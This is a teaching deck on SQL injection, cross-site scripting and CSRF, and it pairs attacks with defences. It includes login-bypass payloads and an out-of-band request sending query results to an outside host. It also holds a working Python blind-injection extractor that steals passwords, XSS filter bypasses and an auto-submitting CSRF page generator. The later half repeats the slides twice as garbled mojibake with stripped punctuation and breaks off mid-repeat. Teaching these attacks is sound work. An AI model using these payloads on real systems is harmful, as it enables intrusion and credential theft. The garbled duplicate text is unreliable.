Vulnerabilities In Web Applications
What is a Vulnerability
• A vulnerability is a weakness that allows an attacker to reduce a system's information assurance (its confidentiality, integrity or availability)
• It comprises three elements
1 A flaw in the system
2 Attacker access to the flaw
3 Attacker capability to exploit the flaw
• Vulnerability life cycle
1 Vulnerability is discovered
2 Vulnerability becomes known to the vendor
3 Patch is published
4 Patch is installed on the affected systems
The system stays exposed from step 1 until step 4, not merely until the patch is published
Prevailing Vulnerabilities in Web Applications (the OWASP Top 10, 2013 edition)
1 Injection flaws such as SQL and LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting (XSS)
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery (CSRF)
9 Using Components with Known Vulnerabilities
10 Unvalidated Redirects and Forwards
Agenda
• SQL Injection
• Cross Site Scripting (XSS)
• Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
• SQL injection is the insertion of SQL syntax into an application's data input so that the input becomes part of a query
• Using this technique a malicious user can inject SQL commands into a SQL statement through web page input
• SQL queries written by programmers incorporate user-supplied data; when that data is concatenated into the query text instead of being passed as a bound parameter, the user controls part of the query
• Attackers make use of this to change what the query does
What harm does SQL Injection do
• Read data from the database, including other users' records
• Execute administrative operations such as dropping tables
• Modify or delete data in the database
General Application Behavior
Examples
• SELECT * FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true, every row of the Users table is returned
This happens when the UserId input is concatenated into the query without validation (here it is not even quoted, so no quote character is needed to break out of the statement)
• SELECT * FROM Users WHERE Username='$username' AND Password='$password'
$username = 1' or '1' = '1
$password = 1' or '1' = '1
Then the query becomes
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
Because AND binds tighter than OR, this reads as Username='1' OR ('1'='1' AND Password='1') OR '1'='1', which is true for every row, so the login succeeds without a valid password
• SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))
$username = 1' or '1' = '1'))/*
$password = foo
Then the query becomes
SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('foo')))
The injected closing parentheses complete the WHERE clause and the /* opens a comment that swallows the rest of the original query (on engines that accept an unterminated comment; -- or # serve the same purpose on others), so the password check never runs and all rows of the Users table are returned
Types of SQL Injection attacks
• In-band
The injected query's results (or its error messages) come back directly in the web application's own response page, for example a lookup such as
SELECT * FROM ... WHERE USERNAME='VENKAT'
whose output is rendered in the page
• Out-of-band
Data is retrieved over a different channel than the application's response (for example the results are sent in an email, or in an HTTP or DNS request to a server the attacker controls)
On Oracle, UTL_HTTP.REQUEST can be used to send query results to a remote host
A request for an out-of-band attack can look like
• http://www.example.com/product.php?id=10||UTL_HTTP.request('testerserver.com:80')
The || concatenation makes the database evaluate the function call while running the query; the attacker then watches the web server log on testerserver.com for the incoming connection
• Inferential or Blind
1 No data is returned directly in this type of attack
2 Requests are submitted and the database server's behaviour (page content, error or no error, response time) is observed to reconstruct the query's result one true/false question at a time
3 Blind attacks are used when the data is not returned by the server and only a generic error message is displayed
Prevention of SQL Injection
• Use parameterized queries (prepared statements) so that user data is bound as values and can never become part of the SQL text; this is the primary defence
• Assume all user-submitted data is hostile and validate everything (type, length, format, allow-list of characters)
• Ensure the application's database account has the least privileges it needs (no DROP, no access to other schemas)
• Install patches and updates as soon as possible
• Display a generic error message instead of printing stack traces or database error text
• Use stored procedures and do not expose sensitive details, with the caveat that a stored procedure that builds dynamic SQL from its arguments is just as injectable
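The login and lookup queries from the examples above, run against a throw-away SQLite database, next to the parameterized form that the first prevention bullet calls for. This is an added example, not code from the original slides: the Users rows, the table layout and the function names are constructed for the demonstration, and the MD5() call of the third example is left out because SQLite has no such function.

```python
import sqlite3

# Constructed sample rows (not from the slides): three users with plaintext passwords,
# kept that way only so the injected queries are easy to follow.
SAMPLE_USERS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
    (3, "carol", "letmein"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The slides' pattern: input pasted straight into the SQL text.
    Returns every username the query matches; a real app would log the first one in."""
    sql = ("SELECT Username FROM Users WHERE Username='%s' AND Password='%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_paren_vulnerable(conn, username, password):
    """The parenthesised variant from the third example (hashing omitted): the attacker
    closes the brackets and opens a /* comment that hides the rest of the statement."""
    sql = ("SELECT Username FROM Users WHERE ((Username='%s') AND (Password='%s'))"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same query with placeholders: the driver sends the values separately from the
    SQL text, so quote characters in the input can never change the query structure."""
    sql = "SELECT Username FROM Users WHERE Username=? AND Password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def by_id_vulnerable(conn, user_id):
    """The 'UserId = 105 or 1=1' case: a numeric parameter concatenated without quotes,
    so no quote character is needed to break out."""
    sql = "SELECT Username FROM Users WHERE UserId = %s" % user_id
    return [row[0] for row in conn.execute(sql)]


def by_id_safe(conn, user_id):
    """Validate the type first, then bind it; '105 or 1=1' fails int() and is rejected."""
    uid = int(user_id)  # raises ValueError for anything that is not an integer literal
    sql = "SELECT Username FROM Users WHERE UserId = ?"
    return [row[0] for row in conn.execute(sql, (uid,))]


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or '1'='1"
    print(login_vulnerable(db, tautology, tautology))                # all three users
    print(login_paren_vulnerable(db, "1' or '1'='1'))/*", "foo"))    # all three users
    print(login_safe(db, tautology, tautology))                      # []
    print(by_id_vulnerable(db, "105 or 1=1"))                        # all three users
    print(by_id_safe(db, "2"))                                       # ['bob']
```

The safe variants do not try to strip or escape quotes; they keep data and code on separate channels, which is what makes the tautology payloads inert regardless of what characters they contain.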
How to test for SQL Injection
• Analyze the areas where the application talks to the database server (login forms, search boxes, lookups by id, anything that ends up in a query)
• Submit test data with a fuzzer or a predefined list of inputs (a single quote, a closing parenthesis, a comment sequence, and 1=1 / 1=2 pairs)
• Monitor the responses from the server
• If the application prints a stack trace or database error, use it to refine the injected query and try again
• If the application returns a generic error, look for error details or changed output in the page source
• If the application gives no information at all, fall back to the blind injection technique: compare the response to a condition you know is true with the response to one you know is false, or use a time delay
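The blind technique described in the Inferential or Blind bullet and in the last testing step, carried out end to end against a simulated vulnerable page. This is an added example and not code from the original slides: the Products and Users tables, the product_page function standing in for the application, and the class and function names are all constructed for the demonstration. The page never returns data or error text, only "rendered" or "generic error", and that single bit is enough to read a password out of another table.

```python
import sqlite3

# Constructed sample data (not from the slides): a product catalogue the page looks up
# by id, and a Users table whose contents the attacker cannot see directly.
SAMPLE_PRODUCTS = [(1, "Keyboard"), (2, "Mouse")]
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (Id INTEGER, Name TEXT)")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?, ?)", SAMPLE_PRODUCTS)
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def product_page(conn, product_id):
    """Simulated vulnerable page (think product.php?id=...): the id is concatenated unquoted.
    Returns True when a product row matched (page renders normally) and False when nothing
    matched or the query failed (generic error page). No data or error text ever leaks."""
    sql = "SELECT Name FROM Products WHERE Id = %s" % product_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


class BlindExtractor:
    """Reconstructs the value of a SQL expression from true/false page responses only."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0  # how many requests the attack needed

    def ask(self, condition):
        """One oracle query: the page renders only if product 1 exists AND condition holds."""
        self.queries += 1
        return product_page(self.conn, "1 AND (%s)" % condition)

    def find_int(self, expr, lo, hi):
        """Binary search for the integer value of `expr` in [lo, hi] via '> mid' questions."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("%s > %d" % (expr, mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_string(self, subquery, max_len=64):
        """Length first, then one printable-ASCII character per position."""
        length = self.find_int("length(%s)" % subquery, 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            code = self.find_int("unicode(substr(%s, %d, 1))" % (subquery, pos), 32, 126)
            chars.append(chr(code))
        return "".join(chars)


def steal_password(conn, username):
    """Pull one user's password out through the blind oracle. Returns (value, query_count)."""
    ex = BlindExtractor(conn)
    secret = "(SELECT Password FROM Users WHERE Username='%s')" % username
    return ex.extract_string(secret), ex.queries


if __name__ == "__main__":
    db = make_db()
    print(product_page(db, "1"))            # True: normal page
    print(product_page(db, "1 AND 1=2"))    # False: indistinguishable from an unknown id
    print(steal_password(db, "alice"))      # ('s3cret', <a few dozen requests>)
```

Binary search over the code point keeps the request count to about seven per character; a linear scan over a character set would work too but is what makes blind injection look slow in practice. Tools such as sqlmap automate exactly this loop, including the time-based variant used when even the true/false page difference is absent.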
Cross Site Scripting
• XSS is the short form of Cross Site Scripting
• XSS lets an attacker attack the users of a site by injecting a script into a web page served by that site
• The script executes in the browser of every user who visits the page
• It does not attack the web application server or the database; the victims are the application's users
• It breaks the trust the user has in the web application, because the injected script runs with the page's origin and the user's session
Key players in XSS
• Browser
• External sources
Browser
1 The browser receives information from the server which can be classified as data and instructions (markup and script)
2 It displays data as plain text
3 It executes instructions within the instruction context
4 The problem is that it will also execute instructions that arrive as part of data, because once the two are mixed in one HTML response it cannot tell them apart
For example, consider that the delivery instructions for a product are entered as
This is a <script>alert(1)</script> Test order
If that text is written into the page as-is, the browser treats the script element as an instruction and runs it
Default browser behavior
1 User requests a site
2 Server responds with HTML, CSS, JavaScript and other files
3 Browser renders the content given by the site, executing any script it contains
External Source
• If an application does not validate user input properly, user input along with a malicious script gets into the application
• The browser executes the script that is part of that input when it receives the data from the server in the form of a response
Possible sources of user input
1 Form inputs
2 Reviews or comments (stored and later shown to other users)
3 Query string parameter values
4 Any other data the server receives from outside and later writes into a page: HTTP headers, cookies, data pulled from third-party feeds
So improper handling of input data coming from an external source is the cause of cross site scripting
Sample Scenario
1 User 1 posts a comment containing <script> tags to the server
2 User 2 views the comments page and User 2's browser executes the script
3 User 1 steals User 2's data (for example the session cookie, sent to a host User 1 controls)
What can be done using Cross Site Scripting
• Stealing user cookies (session hijacking)
• Stealing confidential information shown on the page
• Malicious redirects
>> Redirecting to an attacker site and asking for login credentials
• Social engineering
>> Injecting new HTML code into the trusted page and asking for personal information, credit card details, etc.
• Performing clipboard theft
Types of Cross Site Scripting
• Persistent (stored) XSS
The script injected into an input field is stored on the server side (database, file, etc.) and the same data is displayed to other users, so every visitor to that page is attacked
• Reflected XSS
The injected script is not stored on the server but is echoed straight back in the response (typically from a URL parameter) and the browser executes it; the victim has to be induced to open the crafted link
• DOM XSS
The injected script is placed into the page by client-side JavaScript that reads attacker-controlled DOM data and writes it into the page with innerHTML, document.write or similar. It does not require the server to reflect anything, so server-side filtering never sees it
Example sources: document.URL, document.location.hash, window.name, etc.
Preventing XSS
• Filtering data
If the user provides <script>alert(1)</script> then after filtering out the tags it becomes alert(1), so the browser simply displays text and executes no instruction
Filtering on its own is fragile: a filter that removes <script> once is defeated by <scr<script>ipt>, and payloads such as <img src=x onerror=alert(1)> contain no script tag at all
• Encoding data
1 If the user provides <script>alert(1)</script> then after encoding it becomes &lt;script&gt;alert(1)&lt;/script&gt;
2 When the encoded data is sent to the browser it is displayed as <script>alert(1)</script> instead of being executed as script
3 The encoding must match the output context: HTML entity encoding for element content and attribute values, JavaScript string escaping inside scripts, URL encoding inside URLs
A few other methods are also used for preventing XSS, for example a Content Security Policy, and the HttpOnly flag on session cookies so that a successful injection at least cannot read them
How to Test for XSS vulnerability
1 Identify all input fields: HTTP parameters, POST data, hidden form field values, and predefined radio or selection values (these can be changed in an intercepting proxy just like any other parameter)
2 Submit specially crafted input data into each field, for example a unique marker string together with the characters < > " ' &
3 Analyze the resulting HTML response and search for the marker to see where the input is reflected and in which context (element content, attribute, script, URL)
4 Find the characters that are not properly encoded or filtered out in that context; those determine which payload will execute
Tools like OWASP ZAP can be used to automate cross site scripting testing of our web applications
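The two defences from Preventing XSS and the marker-based probe from the testing steps, put side by side. This is an added example and not code from the original slides: the comment-rendering function, the marker string zz9 and the function names are constructed for the demonstration. The filter is deliberately as naive as the slide describes so that the bypass is visible; html.escape is the standard-library HTML entity encoder.

```python
import html
import re

PAYLOAD = "<script>alert(1)</script>"
# The characters that can change structure in an HTML text or attribute context.
SPECIALS = ['<', '>', '"', "'", '&']


def naive_filter(text):
    """The slides' filtering approach: strip <script> and </script> tags.
    Kept deliberately naive to show why filtering alone is not enough."""
    return re.sub(r"</?script>", "", text, flags=re.IGNORECASE)


def encode_html(text):
    """The slides' encoding approach: entity-encode the characters that can
    break out of an HTML element or attribute (& < > " ')."""
    return html.escape(text, quote=True)


def render_comment(comment, sanitizer):
    """Simulated comments page: the user's comment is written into the HTML body."""
    return '<p class="comment">%s</p>' % sanitizer(comment)


def reflection_check(render):
    """Testing step from the slides: submit a marker with each special character and
    see which ones come back verbatim. `render` maps an input string to the page HTML.
    Returns the characters that were neither encoded nor removed."""
    unencoded = []
    for ch in SPECIALS:
        probe = "zz9%szz9" % ch          # unique marker so it is easy to find in the page
        if probe in render(probe):
            unencoded.append(ch)
    return unencoded


if __name__ == "__main__":
    print(naive_filter(PAYLOAD))                                       # alert(1)
    print(naive_filter("<scr<script>ipt>alert(1)</scr</script>ipt>"))  # <script>alert(1)</script>
    print(naive_filter("<img src=x onerror=alert(1)>"))                # unchanged: nothing to strip
    print(encode_html(PAYLOAD))                                        # &lt;script&gt;alert(1)&lt;/script&gt;
    print(reflection_check(lambda s: render_comment(s, naive_filter)))  # ['<', '>', '"', "'", '&']
    print(reflection_check(lambda s: render_comment(s, encode_html)))   # []
```

The probe reports what survived, not whether the page is exploitable; that still depends on the context the marker landed in, which is why step 3 of the testing procedure asks you to look at the surrounding HTML. encode_html is only right for element content and quoted attribute values; text written into a script block or a URL needs the encoder for that context.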
Cross Site Request Forgery
What is CSRF
• A CSRF attack forces an end user to execute unwanted actions on a web application in which the user is currently authenticated
• For example, the attack could result in a transfer of funds, a changed password or a purchased item, all in the user's context
• In effect CSRF attacks are used by an attacker to make a target system perform a function (funds transfer, form submission, etc.) via the target's browser without the knowledge of the target user, at least until the unauthorized function has been committed
Sample Scenario
(figure: a request such as http://www.gmail.com/deleteAllMessages, used here as an illustration, arriving at the victim site with the user's session ID cookie attached)
• Consider that the site relies only on information known to the browser, namely the session cookie
• For an authenticated user the browser will automatically send that cookie with every subsequent request to the site
• The request in the figure can be generated in three ways, and the server cannot distinguish between them
1 By the user clicking a link or button inside the application
2 By the user typing the URL directly
3 By the user following an external link, for example one planted by an attacker on another site
Why does CSRF usually happen
• Web browsers attach session information such as cookies and HTTP authentication credentials to every request to a site, regardless of which page triggered the request
• The attacker possesses knowledge of valid web application URLs, which are rarely secret
For example https://www.example.com/myaccount/creditcards
• The application relies entirely on information which is known by the browser (the cookie) to authorize a state-changing request
• HTML tags exist whose mere presence makes the browser request application resources, such as the <img> tag
For example
<img src="https://www.example.com/deleteProduct" width="0" height="0">
How does the user get involved in a CSRF attack
• By following a link in an anonymous email or in a chat group
The server responds to the request because the user's session information is automatically sent by the browser along with it
• By following a link to a page containing the following HTML, which issues the request without any further click
<html><body>
<img src="http://www.example.com/action">
</body></html>
A POST endpoint can be hit the same way with a hidden form that a script on the attacker's page submits automatically
Facts about CSRF
• Customers of a bank in Mexico were attacked with an email containing an <img> tag. The URL in the img tag changed the DNS entry for the bank in the customers' home routers and pointed it to a malicious website impersonating the bank
• About 18 million users of eBay's internet auction site in Korea lost their personal information
• CSRF is ranked 8th in the OWASP Top Ten (2013) list
How to test for CSRF weakness in a web application
• Consider a URL u = http://www.example.com/action that performs a state-changing operation
• Build an HTML page on a different origin which contains an HTTP request referencing URL u (an <img> for a GET, an auto-submitted form for a POST)
• Make sure the test user is logged into the application
• Induce the user (or your own second browser tab) into opening that page
• Check whether the web server executed the request; if the action happened without any secret that the attacker's page could not have known, the endpoint is vulnerable
Preventing CSRF attacks
• Include a CSRF token per user session in every state-changing form or request and verify it on the server (synchronizer token pattern)
• Double-submit cookie pattern: send the token both as a cookie and as a request parameter and check on the server that the two match
• As additional layers, set the SameSite attribute on the session cookie and check the Origin or Referer header on state-changing requests
• Log out of sensitive applications when the work is done
• Do not save login credentials in the browser
• Use secure browser extensions
The last three are user-side hygiene; only the server-side checks actually close the hole
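The two server-side defences above (synchronizer token and double-submit cookie) applied to a simulated funds-transfer endpoint, together with the auto-submitting proof-of-concept page that the CSRF testing steps ask for. This is an added example and not code from the original slides: the session layout, the SERVER_SECRET value, the endpoint and all function names are constructed for the demonstration. The forged request carries the session cookie (the browser adds it automatically) but no token, which is exactly what an attacker's page can and cannot produce.

```python
import hashlib
import hmac
import html
import secrets

# Constructed demo key (not from the slides); a real deployment loads it from configuration.
SERVER_SECRET = b"demo-only-server-secret"


def new_session(user):
    """Server-side session: a random session id plus a random per-session CSRF token."""
    return {"id": secrets.token_hex(16), "user": user, "csrf": secrets.token_urlsafe(32)}


def synchronizer_check(session, cookies, form):
    """Synchronizer token pattern: the token stored in the server-side session must be
    echoed in the form body. A page on another origin cannot read it (same-origin policy)."""
    return hmac.compare_digest(session["csrf"], form.get("csrf_token", ""))


def double_submit_value(session_id):
    """Double-submit cookie, keyed variant: the cookie value is HMAC(secret, session id),
    so it cannot be guessed or planted by a script on a sibling subdomain."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def double_submit_check(session, cookies, form):
    """Double-submit cookie pattern: cookie value and form value must both equal the
    expected HMAC. The browser sends the cookie automatically, but only a page from the
    site's own origin can copy it into the form."""
    expected = double_submit_value(cookies.get("sid", ""))
    return (hmac.compare_digest(cookies.get("csrf", ""), expected)
            and hmac.compare_digest(form.get("csrf_token", ""), expected))


def handle_transfer(session, cookies, form, check):
    """State-changing endpoint (the funds transfer from the slides). `check` is one of
    the validators above. Returns an (HTTP status, message) pair."""
    if cookies.get("sid") != session["id"]:
        return 401, "not logged in"
    if not check(session, cookies, form):
        return 403, "CSRF check failed"
    return 200, "transferred %s to %s" % (form.get("amount"), form.get("to"))


def csrf_poc_html(url, fields):
    """Tester's proof-of-concept page: a form that auto-submits a POST to `url` with the
    given fields. It contains no token, which is why a protected endpoint must reject it."""
    inputs = "".join('<input type="hidden" name="%s" value="%s">'
                     % (html.escape(k, quote=True), html.escape(v, quote=True))
                     for k, v in fields.items())
    return ('<html><body onload="document.forms[0].submit()">'
            '<form method="POST" action="%s">%s</form></body></html>'
            % (html.escape(url, quote=True), inputs))


if __name__ == "__main__":
    s = new_session("alice")
    cookies = {"sid": s["id"]}                   # what the browser attaches automatically
    legit = {"to": "bob", "amount": "100", "csrf_token": s["csrf"]}
    forged = {"to": "mallory", "amount": "100"}  # attacker's page cannot know the token
    print(handle_transfer(s, cookies, legit, synchronizer_check))   # (200, ...)
    print(handle_transfer(s, cookies, forged, synchronizer_check))  # (403, ...)
    print(csrf_poc_html("http://www.example.com/action", forged))
```

Both checks use hmac.compare_digest so the comparison does not leak the token through timing. The keyed double-submit variant is what makes the stateless pattern safe against an attacker who can set cookies for the parent domain from a subdomain they control; a plain random cookie copied into the form would not be.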
What is a Vulnerability
bull Vulnerability is a weakness which allows an attacker to reduce a systems
information assurance
bull It comprises of three elements
1 Flaw in the System
2 Attacker access to flaw
3 Capability of attacker to exploit flaw
bull Vulnerability Life Cycle
1 Vulnerability is discovered
2 Vulnerability is known to vendor
3 Patch is published
4 Patch is installed in affected systems
Prevailing Vulnerabilities in Web Applications
1 Injection flaws such as SQL LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery
9 Using components with known Vulnerabilities
10 Invalidated Redirects and Forwards
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Prevailing Vulnerabilities in Web Applications
1 Injection flaws such as SQL LDAP injection
2 Broken Authentication and Session Management
3 Cross Site Scripting
4 Insecure Direct Object References
5 Security Misconfiguration
6 Sensitive Data Exposure
7 Missing Function Level Access Control
8 Cross Site Request Forgery
9 Using components with known Vulnerabilities
10 Invalidated Redirects and Forwards
Agenda
bull SQL Injection
bull Cross Site Scripting ( XSS)
bull Cross Site Request Forgery (CSRF)
SQL Injection
What is SQL Injection
bull An SQL Injection is basically inserting or injecting a SQL query via the data input
bull Using this Technique malicious users can inject SQL commands into SQL
statement via web page input
bull SQL queries written by programmers make use of user supplied data
bull Attackers make use of above feature and try to exploit application
What harm does SQL Injection do
bull Read data from database
bull Execute administrator operations like Delete Tables
bull Modify data in database
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
